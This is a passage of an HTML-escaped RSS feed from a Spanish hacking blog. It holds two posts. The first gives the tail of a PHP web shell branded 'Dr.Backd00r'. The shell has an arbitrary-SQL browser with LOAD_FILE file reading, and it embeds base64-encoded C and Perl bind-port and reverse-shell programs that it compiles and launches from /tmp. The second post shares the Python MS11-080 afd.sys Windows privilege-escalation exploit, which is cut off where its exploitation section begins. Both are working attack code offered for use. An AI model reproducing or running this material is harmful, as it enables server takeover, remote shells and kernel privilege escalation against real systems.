    ?&amp;gt; 
    &amp;lt;h1&amp;gt;Sql browser&amp;lt;/h1&amp;gt;&amp;lt;div class=content&amp;gt; 
    &amp;lt;form name="sf" method="post"&amp;gt; 
        &amp;lt;table cellpadding="2" cellspacing="0"&amp;gt; 
            &amp;lt;tr&amp;gt; 
                &amp;lt;td&amp;gt;Type&amp;lt;/td&amp;gt; 
                &amp;lt;td&amp;gt;Host&amp;lt;/td&amp;gt; 
                &amp;lt;td&amp;gt;Login&amp;lt;/td&amp;gt; 
                &amp;lt;td&amp;gt;Password&amp;lt;/td&amp;gt; 
                &amp;lt;td&amp;gt;Database&amp;lt;/td&amp;gt; 
                &amp;lt;td&amp;gt;&amp;lt;/td&amp;gt; 
            &amp;lt;/tr&amp;gt; 
            &amp;lt;tr&amp;gt; 
                &amp;lt;input type=hidden name=a value=Sql&amp;gt; 
                &amp;lt;input type=hidden name=p1 value='query'&amp;gt; 
                &amp;lt;input type=hidden name=p2&amp;gt; 
                &amp;lt;input type=hidden name=c value='&amp;lt;?=htmlspecialchars($GLOBALS['cwd']);?&amp;gt;'&amp;gt; 
                &amp;lt;input type=hidden name=charset value='&amp;lt;?=isset($_POST['charset'])?$_POST['charset']:''?&amp;gt;'&amp;gt; 
                &amp;lt;td&amp;gt; 
                    &amp;lt;select name='type'&amp;gt; 
                        &amp;lt;option value="mysql" &amp;lt;?php if(@$_POST['type']=='mysql')echo 'selected';?&amp;gt;&amp;gt;MySql&amp;lt;/option&amp;gt; 
                        &amp;lt;option value="pgsql" &amp;lt;?php if(@$_POST['type']=='pgsql')echo 'selected';?&amp;gt;&amp;gt;PostgreSql&amp;lt;/option&amp;gt; 
                    &amp;lt;/select&amp;gt;&amp;lt;/td&amp;gt; 
                &amp;lt;td&amp;gt;&amp;lt;input type=text name=sql_host value='&amp;lt;?=(empty($_POST['sql_host'])?'localhost':htmlspecialchars($_POST['sql_host']));?&amp;gt;'&amp;gt;&amp;lt;/td&amp;gt; 
                &amp;lt;td&amp;gt;&amp;lt;input type=text name=sql_login value='&amp;lt;?=(empty($_POST['sql_login'])?'root':htmlspecialchars($_POST['sql_login']));?&amp;gt;'&amp;gt;&amp;lt;/td&amp;gt; 
                &amp;lt;td&amp;gt;&amp;lt;input type=text name=sql_pass value='&amp;lt;?=(empty($_POST['sql_pass'])?'':htmlspecialchars($_POST['sql_pass']));?&amp;gt;'&amp;gt;&amp;lt;/td&amp;gt; 
                &amp;lt;td&amp;gt; 
    &amp;lt;?php 
    $tmp = "&amp;lt;input type=text name=sql_base value=''&amp;gt;"; 
    if(isset($_POST['sql_host'])){ 
        if($db-&amp;gt;connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) { 
            switch($_POST['charset']) { 
                case "Windows-1251": $db-&amp;gt;setCharset('cp1251'); break; 
                case "UTF-8": $db-&amp;gt;setCharset('utf8'); break; 
                case "KOI8-R": $db-&amp;gt;setCharset('koi8r'); break; 
                case "KOI8-U": $db-&amp;gt;setCharset('koi8u'); break; 
                case "cp866": $db-&amp;gt;setCharset('cp866'); break; 
            } 
            $db-&amp;gt;listDbs(); 
            echo "&amp;lt;select name=sql_base&amp;gt;&amp;lt;option value=''&amp;gt;&amp;lt;/option&amp;gt;"; 
            while($item = $db-&amp;gt;fetch()) { 
                list($key, $value) = each($item); 
                echo '&amp;lt;option value="'.$value.'" '.($value==$_POST['sql_base']?'selected':'').'&amp;gt;'.$value.'&amp;lt;/option&amp;gt;'; 
            } 
            echo '&amp;lt;/select&amp;gt;'; 
        } 
        else echo $tmp; 
    }else 
        echo $tmp; 
    ?&amp;gt;&amp;lt;/td&amp;gt; 
                &amp;lt;td&amp;gt;&amp;lt;input type=submit value="&amp;gt;&amp;gt;"&amp;gt;&amp;lt;/td&amp;gt; 
            &amp;lt;/tr&amp;gt; 
        &amp;lt;/table&amp;gt; 
        &amp;lt;script&amp;gt; 
            function st(t,l) { 
                document.sf.p1.value = 'select'; 
                document.sf.p2.value = t; 
                if(l!=null)document.sf.p3.value = l; 
                document.sf.submit(); 
            } 
            function is() { 
                for(i=0;i&amp;lt;document.sf.elements['tbl[]'].length;++i) 
                    document.sf.elements['tbl[]'][i].checked = !document.sf.elements['tbl[]'][i].checked; 
            } 
        &amp;lt;/script&amp;gt; 
    &amp;lt;?php 
    if(isset($db) &amp;amp;&amp;amp; $db-&amp;gt;link){ 
        echo "&amp;lt;br/&amp;gt;&amp;lt;table width=100% cellpadding=2 cellspacing=0&amp;gt;"; 
            if(!empty($_POST['sql_base'])){ 
                $db-&amp;gt;selectdb($_POST['sql_base']); 
                echo "&amp;lt;tr&amp;gt;&amp;lt;td width=1 style='border-top:2px solid #666;border-right:2px solid #666;'&amp;gt;&amp;lt;span&amp;gt;Tables:&amp;lt;/span&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;"; 
                $tbls_res = $db-&amp;gt;listTables(); 
                while($item = $db-&amp;gt;fetch($tbls_res)) { 
                    list($key, $value) = each($item); 
                    $n = $db-&amp;gt;fetch($db-&amp;gt;query('SELECT COUNT(*) as n FROM '.$value.'')); 
                    $value = htmlspecialchars($value); 
                    echo "&amp;lt;nobr&amp;gt;&amp;lt;input type='checkbox' name='tbl[]' value='".$value."'&amp;gt;&amp;amp;nbsp;&amp;lt;a href=# onclick=\"st('".$value."')\"&amp;gt;".$value."&amp;lt;/a&amp;gt; (".$n['n'].")&amp;lt;/nobr&amp;gt;&amp;lt;br&amp;gt;";
                } 
                echo "&amp;lt;input type='checkbox' onclick='is();'&amp;gt; &amp;lt;input type=button value='Dump' onclick='document.sf.p2.value=\"download\";document.sf.submit();'&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;td style='border-top:2px solid #666;'&amp;gt;"; 
                if(@$_POST['p1'] == 'select') { 
                    $_POST['p1'] = 'query'; 
                    $db-&amp;gt;query('SELECT COUNT(*) as n FROM '.$_POST['p2'].''); 
                    $num = $db-&amp;gt;fetch(); 
                    $num = $num['n']; 
                    echo "&amp;lt;span&amp;gt;".$_POST['p2']."&amp;lt;/span&amp;gt; ($num) "; 
                    for($i=0;$i&amp;lt;($num/30);$i++) 
                        if($i != (int)$_POST['p3']) 
                            echo "&amp;lt;a href='#' onclick='st(\"".$_POST['p2']."\", $i)'&amp;gt;",($i+1),"&amp;lt;/a&amp;gt; "; 
                        else 
                            echo ($i+1)," "; 
                    if($_POST['type']=='pgsql') 
                        $_POST['p3'] = 'SELECT * FROM '.$_POST['p2'].' LIMIT 30 OFFSET '.($_POST['p3']*30); 
                    else 
                        $_POST['p3'] = 'SELECT * FROM `'.$_POST['p2'].'` LIMIT '.($_POST['p3']*30).',30'; 
                    echo "&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;"; 
                } 
                if((@$_POST['p1'] == 'query') &amp;amp;&amp;amp; !empty($_POST['p3'])) { 
                    $db-&amp;gt;query(@$_POST['p3']); 
                    if($db-&amp;gt;res !== false) { 
                        $title = false; 
                        echo '&amp;lt;table width=100% cellspacing=0 cellpadding=2 class=main&amp;gt;'; 
                        $line = 1; 
                        while($item = $db-&amp;gt;fetch())    { 
                            if(!$title)    { 
                                echo '&amp;lt;tr&amp;gt;'; 
                                foreach($item as $key =&amp;gt; $value) 
                                    echo '&amp;lt;th&amp;gt;'.$key.'&amp;lt;/th&amp;gt;'; 
                                reset($item); 
                                $title=true; 
                                echo '&amp;lt;/tr&amp;gt;&amp;lt;tr&amp;gt;'; 
                                $line = 2; 
                            } 
                            echo '&amp;lt;tr class="l'.$line.'"&amp;gt;'; 
                            $line = $line==1?2:1; 
                            foreach($item as $key =&amp;gt; $value) { 
                                if($value == null) 
                                    echo '&amp;lt;td&amp;gt;&amp;lt;i&amp;gt;null&amp;lt;/i&amp;gt;&amp;lt;/td&amp;gt;'; 
                                else 
                                    echo '&amp;lt;td&amp;gt;'.nl2br(htmlspecialchars($value)).'&amp;lt;/td&amp;gt;'; 
                            } 
                            echo '&amp;lt;/tr&amp;gt;'; 
                        } 
                        echo '&amp;lt;/table&amp;gt;'; 
                    } else { 
                        echo '&amp;lt;div&amp;gt;&amp;lt;b&amp;gt;Error:&amp;lt;/b&amp;gt; '.htmlspecialchars($db-&amp;gt;error()).'&amp;lt;/div&amp;gt;'; 
                    } 
                } 
                echo "&amp;lt;br&amp;gt;&amp;lt;textarea name='p3' style='width:100%;height:100px'&amp;gt;".@htmlspecialchars($_POST['p3'])."&amp;lt;/textarea&amp;gt;&amp;lt;br/&amp;gt;&amp;lt;input type=submit value='Execute'&amp;gt;"; 
                echo "&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;"; 
            } 
            echo "&amp;lt;/table&amp;gt;&amp;lt;/form&amp;gt;&amp;lt;br/&amp;gt;&amp;lt;form onsubmit='document.sf.p1.value=\"loadfile\";document.sf.p2.value=this.f.value;document.sf.submit();return false;'&amp;gt;&amp;lt;span&amp;gt;Load file&amp;lt;/span&amp;gt; &amp;lt;input  class='toolsInp' type=text name=f&amp;gt;&amp;lt;input type=submit value='&amp;gt;&amp;gt;'&amp;gt;&amp;lt;/form&amp;gt;"; 
            if(@$_POST['p1'] == 'loadfile') { 
                $db-&amp;gt;query("SELECT LOAD_FILE('".addslashes($_POST['p2'])."') as file"); 
                $file = $db-&amp;gt;fetch(); 
                echo '&amp;lt;pre class=ml1&amp;gt;'.htmlspecialchars($file['file']).'&amp;lt;/pre&amp;gt;';
            } 
    } 
    echo '&amp;lt;/div&amp;gt;'; 
    printFooter(); 
} 
function actionNetwork() { 
    printHeader(); 
    $back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pIHsNCiAgICBpbnQgZmQ7DQogICAgc3RydWN0IHNvY2thZGRyX2luIHNpbjsNCiAgICBkYWVtb24oMSwwKTsNCiAgICBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJdKSk7DQogICAgc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsNCiAgICBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsNCiAgICBpZiAoKGNvbm5lY3QoZmQsIChzdHJ1Y3Qgc29ja2FkZHIgKikgJnNpbiwgc2l6ZW9mKHN0cnVjdCBzb2NrYWRkcikpKTwwKSB7DQogICAgICAgIHBlcnJvcigiQ29ubmVjdCBmYWlsIik7DQogICAgICAgIHJldHVybiAwOw0KICAgIH0NCiAgICBkdXAyKGZkLCAwKTsNCiAgICBkdXAyKGZkLCAxKTsNCiAgICBkdXAyKGZkLCAyKTsNCiAgICBzeXN0ZW0oIi9iaW4vc2ggLWkiKTsNCiAgICBjbG9zZShmZCk7DQp9"; 
    $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7"; 
    $bind_port_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxzdGRsaWIuaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICoqYXJndikgew0KICAgIGludCBzLGMsaTsNCiAgICBjaGFyIHBbMzBdOw0KICAgIHN0cnVjdCBzb2NrYWRkcl9pbiByOw0KICAgIGRhZW1vbigxLDApOw0KICAgIHMgPSBzb2NrZXQoQUZfSU5FVCxTT0NLX1NUUkVBTSwwKTsNCiAgICBpZighcykgcmV0dXJuIC0xOw0KICAgIHIuc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgci5zaW5fcG9ydCA9IGh0b25zKGF0b2koYXJndlsxXSkpOw0KICAgIHIuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7DQogICAgYmluZChzLCAoc3RydWN0IHNvY2thZGRyICopJnIsIDB4MTApOw0KICAgIGxpc3RlbihzLCA1KTsNCiAgICB3aGlsZSgxKSB7DQogICAgICAgIGM9YWNjZXB0KHMsMCwwKTsNCiAgICAgICAgZHVwMihjLDApOw0KICAgICAgICBkdXAyKGMsMSk7DQogICAgICAgIGR1cDIoYywyKTsNCiAgICAgICAgd3JpdGUoYywiUGFzc3dvcmQ6Iiw5KTsNCiAgICAgICAgcmVhZChjLHAsc2l6ZW9mKHApKTsNCiAgICAgICAgZm9yKGk9MDtpPHN0cmxlbihwKTtpKyspDQogICAgICAgICAgICBpZiggKHBbaV0gPT0gJ1xuJykgfHwgKHBbaV0gPT0gJ1xyJykgKQ0KICAgICAgICAgICAgICAgIHBbaV0gPSAnXDAnOw0KICAgICAgICBpZiAoc3RyY21wKGFyZ3ZbMl0scCkgPT0gMCkNCiAgICAgICAgICAgIHN5c3RlbSgiL2Jpbi9zaCAtaSIpOw0KICAgICAgICBjbG9zZShjKTsNCiAgICB9DQp9"; 
    $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0="; 
    ?&amp;gt; 
    &amp;lt;h1&amp;gt;Network tools&amp;lt;/h1&amp;gt;&amp;lt;div class=content&amp;gt; 
    &amp;lt;form name='nfp' onSubmit="g(null,null,this.using.value,this.port.value,this.pass.value);return false;"&amp;gt; 
    &amp;lt;span&amp;gt;Bind port to /bin/sh&amp;lt;/span&amp;gt;&amp;lt;br/&amp;gt; 
    Port: &amp;lt;input type='text' name='port' value='31337'&amp;gt; Password: &amp;lt;input type='text' name='pass' value='wso'&amp;gt; Using: &amp;lt;select name="using"&amp;gt;&amp;lt;option value='bpc'&amp;gt;C&amp;lt;/option&amp;gt;&amp;lt;option value='bpp'&amp;gt;Perl&amp;lt;/option&amp;gt;&amp;lt;/select&amp;gt; &amp;lt;input type=submit value="&amp;gt;&amp;gt;"&amp;gt; 
    &amp;lt;/form&amp;gt; 
    &amp;lt;form name='nfp' onSubmit="g(null,null,this.using.value,this.server.value,this.port.value);return false;"&amp;gt; 
    &amp;lt;span&amp;gt;Back-connect to&amp;lt;/span&amp;gt;&amp;lt;br/&amp;gt; 
    Server: &amp;lt;input type='text' name='server' value='&amp;lt;?=$_SERVER['REMOTE_ADDR']?&amp;gt;'&amp;gt; Port: &amp;lt;input type='text' name='port' value='31337'&amp;gt; Using: &amp;lt;select name="using"&amp;gt;&amp;lt;option value='bcc'&amp;gt;C&amp;lt;/option&amp;gt;&amp;lt;option value='bcp'&amp;gt;Perl&amp;lt;/option&amp;gt;&amp;lt;/select&amp;gt; &amp;lt;input type=submit value="&amp;gt;&amp;gt;"&amp;gt; 
    &amp;lt;/form&amp;gt;&amp;lt;br&amp;gt; 
    &amp;lt;?php 
    if(isset($_POST['p1'])) { 
        function cf($f,$t) { 
            $w=@fopen($f,"w") or @function_exists('file_put_contents'); 
            if($w)    { 
                @fwrite($w,@base64_decode($t)) or @fputs($w,@base64_decode($t)) or @file_put_contents($f,@base64_decode($t)); 
                @fclose($w); 
            } 
        } 
        if($_POST['p1'] == 'bpc') { 
            cf("/tmp/bp.c",$bind_port_c); 
            $out = ex("gcc -o /tmp/bp /tmp/bp.c"); 
            @unlink("/tmp/bp.c"); 
            $out .= ex("/tmp/bp ".$_POST['p2']." ".$_POST['p3']." &amp;amp;"); 
            echo "&amp;lt;pre class=ml1&amp;gt;$out\n".ex("ps aux | grep bp")."&amp;lt;/pre&amp;gt;"; 
        } 
        if($_POST['p1'] == 'bpp') { 
            cf("/tmp/bp.pl",$bind_port_p); 
            $out = ex(which("perl")." /tmp/bp.pl ".$_POST['p2']." &amp;amp;"); 
            echo "&amp;lt;pre class=ml1&amp;gt;$out\n".ex("ps aux | grep bp.pl")."&amp;lt;/pre&amp;gt;"; 
        } 
        if($_POST['p1'] == 'bcc') { 
            cf("/tmp/bc.c",$back_connect_c); 
            $out = ex("gcc -o /tmp/bc /tmp/bc.c"); 
            @unlink("/tmp/bc.c"); 
            $out .= ex("/tmp/bc ".$_POST['p2']." ".$_POST['p3']." &amp;amp;"); 
            echo "&amp;lt;pre class=ml1&amp;gt;$out\n".ex("ps aux | grep bc")."&amp;lt;/pre&amp;gt;"; 
        } 
        if($_POST['p1'] == 'bcp') { 
            cf("/tmp/bc.pl",$back_connect_p); 
            $out = ex(which("perl")." /tmp/bc.pl ".$_POST['p2']." ".$_POST['p3']." &amp;amp;"); 
            echo "&amp;lt;pre class=ml1&amp;gt;$out\n".ex("ps aux | grep bc.pl")."&amp;lt;/pre&amp;gt;"; 
        } 
    } 
    echo '&amp;lt;/div&amp;gt;'; 
    printFooter(); 
} 
if( empty($_POST['a']) ) 
    if(isset($default_action) &amp;amp;&amp;amp; function_exists('action' . $default_action)) 
        $_POST['a'] = $default_action; 
    else 
        $_POST['a'] = 'SecInfo'; 
if( !empty($_POST['a']) &amp;amp;&amp;amp; function_exists('action' . $_POST['a']) ) 
    call_user_func('action' . $_POST['a']); 
?&amp;gt; 
&amp;lt;div id="cot_tl_fixed"&amp;gt;&amp;lt;marquee&amp;gt;Shell - *Dr.Backd00r*  - SubhashDasyam.com&amp;lt;/marquee&amp;gt;&amp;lt;/div&amp;gt; 
 &amp;lt;/marquee&amp;gt;&amp;lt;/div&amp;gt; &lt;/pre&gt;
&lt;br /&gt;
&lt;b&gt;Fuente:&lt;/b&gt; &lt;a href="http://www.subhashdasyam.com/2011/12/404-php-private-error-shell.html"&gt;http://www.subhashdasyam.com/&lt;/a&gt;&lt;br /&gt;
[+] Salu2&lt;div class="blogger-post-footer"&gt;&lt;script type="text/javascript"&gt;&lt;!--
google_ad_client = "ca-pub-7669852180477439";
/* 728 x 90 */
google_ad_slot = "5824550688";
google_ad_width = 728;
google_ad_height = 90;
//--&gt;
&lt;/script&gt;
&lt;script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js"&gt;
&lt;/script&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8845092171963399971-7697940627406156189?l=www.blackploit.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/mZXnjuBhp__ZpZO0h4UQrxB5mQI/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/mZXnjuBhp__ZpZO0h4UQrxB5mQI/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/mZXnjuBhp__ZpZO0h4UQrxB5mQI/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/mZXnjuBhp__ZpZO0h4UQrxB5mQI/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/Hacking-blackploit/~4/SA6TKtecncM" height="1" width="1"/&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2011-12-13T00:31:08.068-03:00</app:edited><media:thumbnail url="http://1.bp.blogspot.com/-SUibbkHDD_M/TubBScXlTII/AAAAAAAAAao/m7Tk0LRRd3c/s72-c/404-error-shell-private.gif" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://www.blackploit.com/2011/12/shell-php-error-404-privada.html</feedburner:origLink></item><item><title>Escalación de Privilegios en Windows (MS11-080 Afd.sys)</title><link>http://feedproxy.google.com/~r/Hacking-blackploit/~3/1VIFA6KAZWU/escalacion-de-privilegios-en-windows.html</link><author>noreply@blogger.com (Zion3R)</author><pubDate>Mon, 05 Dec 2011 17:44:55 PST</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-8845092171963399971.post-2971523765706284278</guid><description>&lt;div style="text-align: justify;"&gt;
&lt;a href="http://2.bp.blogspot.com/-tS_V1JZF6eQ/TtcBKZ9zMOI/AAAAAAAAAaQ/j9VDMSPQVJo/s1600/break_windows.jpg" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img border="0" height="150" src="http://2.bp.blogspot.com/-tS_V1JZF6eQ/TtcBKZ9zMOI/AAAAAAAAAaQ/j9VDMSPQVJo/s200/break_windows.jpg" width="200" /&gt;&lt;/a&gt;Este exploit (MS11-080 privilege escalation) se aprovecha del hecho de que &lt;b&gt;afd.sys&lt;/b&gt; no valida correctamente user-mode que pasa al kernel-mode.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Ando muy corto de tiempo como para &amp;nbsp;poner más detalles (&lt;strike&gt;es más, ni si quiera lo he&amp;nbsp;probado&amp;nbsp;:O&lt;/strike&gt;), pero cualquier &lt;i&gt;Privilege Escalation&lt;/i&gt; es importante hacerlo notar.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Espero conforme los días ir posteando más detalles y modo de uso.&lt;br /&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;pre&gt;&lt;code&gt;Usage: MS11-080.py -O TARGET_OS

Options:
  -h, --help            show this help message and exit
  -O TARGET_OS, --target-os=TARGET_OS
                        Target OS. Accepted values: XP, 2K3&lt;/code&gt;&lt;/pre&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
Les dejo el exploit (Python):&lt;/div&gt;
&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;pre class="brush:python"&gt;################################################################################
######### MS11-080 - CVE-2011-2005 Afd.sys Privilege Escalation Exploit ########
#########         Author: ryujin@offsec.com - Matteo Memelli            ########
#########                      Spaghetti &amp;amp; Pwnsauce                     ########
#########              yuck! 0xbaadf00d Elwood@mac&amp;amp;cheese.com           ########
#########                                                               ########
#########      Thx to dookie(lifesaver)2000ca, dijital1 and ronin       ########
#########                        for helping out!                       ########
#########                                                               ########
#########                   To my Master Shifu muts:                    ########
#########           "So that's it, I just need inner peace?" ;)         ########
#########                                                               ########
#########        Exploit tested on the following 32bits systems:        ########
#########       Win XPSP3 Eng, Win 2K3SP2 Standard/Enterprise Eng       ########
################################################################################
 
from ctypes import (windll, CDLL, Structure, byref, sizeof, POINTER,
                    c_char, c_short, c_ushort, c_int, c_uint, c_ulong,
                    c_void_p, c_long, c_char_p)
from ctypes.wintypes import HANDLE, DWORD
import socket, time, os, struct, sys
from optparse import OptionParser
 
usage =  "%prog -O TARGET_OS"
parser = OptionParser(usage=usage)
parser.add_option("-O", "--target-os", type="string",
                  action="store", dest="target_os",
                  help="Target OS. Accepted values: XP, 2K3")
(options, args) = parser.parse_args()
OS = options.target_os
if not OS or OS.upper() not in ['XP','2K3']:
   parser.print_help()
   sys.exit()
OS = OS.upper()
 
kernel32 = windll.kernel32
ntdll    = windll.ntdll
Psapi    = windll.Psapi
 
def findSysBase(drvname=None):
    ARRAY_SIZE            = 1024
    myarray               = c_ulong * ARRAY_SIZE 
    lpImageBase           = myarray() 
    cb                    = c_int(1024) 
    lpcbNeeded            = c_long() 
    drivername_size       = c_long() 
    drivername_size.value = 48
    Psapi.EnumDeviceDrivers(byref(lpImageBase), cb, byref(lpcbNeeded)) 
    for baseaddy in lpImageBase: 
        drivername = c_char_p("\x00"*drivername_size.value) 
        if baseaddy: 
            Psapi.GetDeviceDriverBaseNameA(baseaddy, drivername, 
                            drivername_size.value)
            if drvname:
                if drivername.value.lower() == drvname:
                    print "[+] Retrieving %s info..." % drvname
                    print "[+] %s base address: %s" % (drvname, hex(baseaddy))
                    return baseaddy
            else:
                if drivername.value.lower().find("krnl") !=-1:
                    print "[+] Retrieving Kernel info..."
                    print "[+] Kernel version:", drivername.value
                    print "[+] Kernel base address: %s" % hex(baseaddy) 
                    return (baseaddy, drivername.value)
    return None
 
print "[&amp;gt;] MS11-080 Privilege Escalation Exploit"
print "[&amp;gt;] Matteo Memelli - ryujin@offsec.com"
print "[&amp;gt;] Release Date 28/11/2011"
 
WSAGetLastError          = windll.Ws2_32.WSAGetLastError
WSAGetLastError.argtypes = ()
WSAGetLastError.restype  = c_int
SOCKET                   = c_int
WSASocket                = windll.Ws2_32.WSASocketA
WSASocket.argtypes       = (c_int, c_int, c_int, c_void_p, c_uint, DWORD)
WSASocket.restype        = SOCKET
closesocket              = windll.Ws2_32.closesocket
closesocket.argtypes     = (SOCKET,)
closesocket.restype      = c_int
connect                  = windll.Ws2_32.connect
connect.argtypes         = (SOCKET, c_void_p, c_int)
connect.restype          = c_int
 
class sockaddr_in(Structure):
    _fields_ = [
        ("sin_family", c_short),
        ("sin_port", c_ushort),
        ("sin_addr", c_ulong),
        ("sin_zero", c_char * 8),
        ]
 
## Create our deviceiocontrol socket handle
client = WSASocket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP,
                   None, 0, 0)
if client == ~0:
    raise OSError, "WSASocket: %s" % (WSAGetLastError(),)
try:
    addr = sockaddr_in()
    addr.sin_family = socket.AF_INET
    addr.sin_port = socket.htons(4455)
    addr.sin_addr = socket.htonl(0x7f000001) # 127.0.0.1
    ## We need to connect to a closed port, socket state must be CONNECTING
    connect(client, byref(addr), sizeof(addr))
except:
    closesocket(client)
    raise
 
baseadd    = c_int(0x1001)
MEMRES     = (0x1000 | 0x2000)
PAGEEXE    = 0x00000040
Zerobits   = c_int(0)
RegionSize = c_int(0x1000)
written    = c_int(0)
## This will trigger the path to AfdRestartJoin
irpstuff   = ("\x41\x41\x41\x41\x42\x42\x42\x42"
              "\x00\x00\x00\x00\x44\x44\x44\x44"
              "\x01\x00\x00\x00"
              "\xe8\x00" + "4" + "\xf0\x00" + "\x45"*231)
## Allocate space for the input buffer
dwStatus = ntdll.NtAllocateVirtualMemory(-1,
                                     byref(baseadd),
                                     0x0,
                                     byref(RegionSize),
                                     MEMRES,
                                     PAGEEXE)
# Copy input buffer to it
kernel32.WriteProcessMemory(-1, 0x1000, irpstuff, 0x100, byref(written))
startPage = c_int(0x00020000)
kernel32.VirtualProtect(startPage, 0x1000, PAGEEXE, byref(written))
################################# KERNEL INFO ##################################
lpDriver     = c_char_p()
lpPath       = c_char_p()
lpDrvAddress = c_long()
(krnlbase, kernelver) = findSysBase()
hKernel = kernel32.LoadLibraryExA(kernelver, 0, 1)
HalDispatchTable = kernel32.GetProcAddress(hKernel, "HalDispatchTable")
HalDispatchTable -= hKernel
HalDispatchTable += krnlbase
print "[+] HalDispatchTable address:", hex(HalDispatchTable)
halbase = findSysBase("hal.dll")
## WinXP SP3
if OS == "XP":
    HaliQuerySystemInformation = halbase+0x16bba # Offset for XPSP3
    HalpSetSystemInformation   = halbase+0x19436 # Offset for XPSP3
## Win2k3 SP2
else:
    HaliQuerySystemInformation = halbase+0x1fa1e # Offset for WIN2K3
    HalpSetSystemInformation   = halbase+0x21c60 # Offset for WIN2K3
print "[+] HaliQuerySystemInformation address:", hex(HaliQuerySystemInformation)
print "[+] HalpSetSystemInformation address:", hex(HalpSetSystemInformation)
 
################################# EXPLOITATION #################################
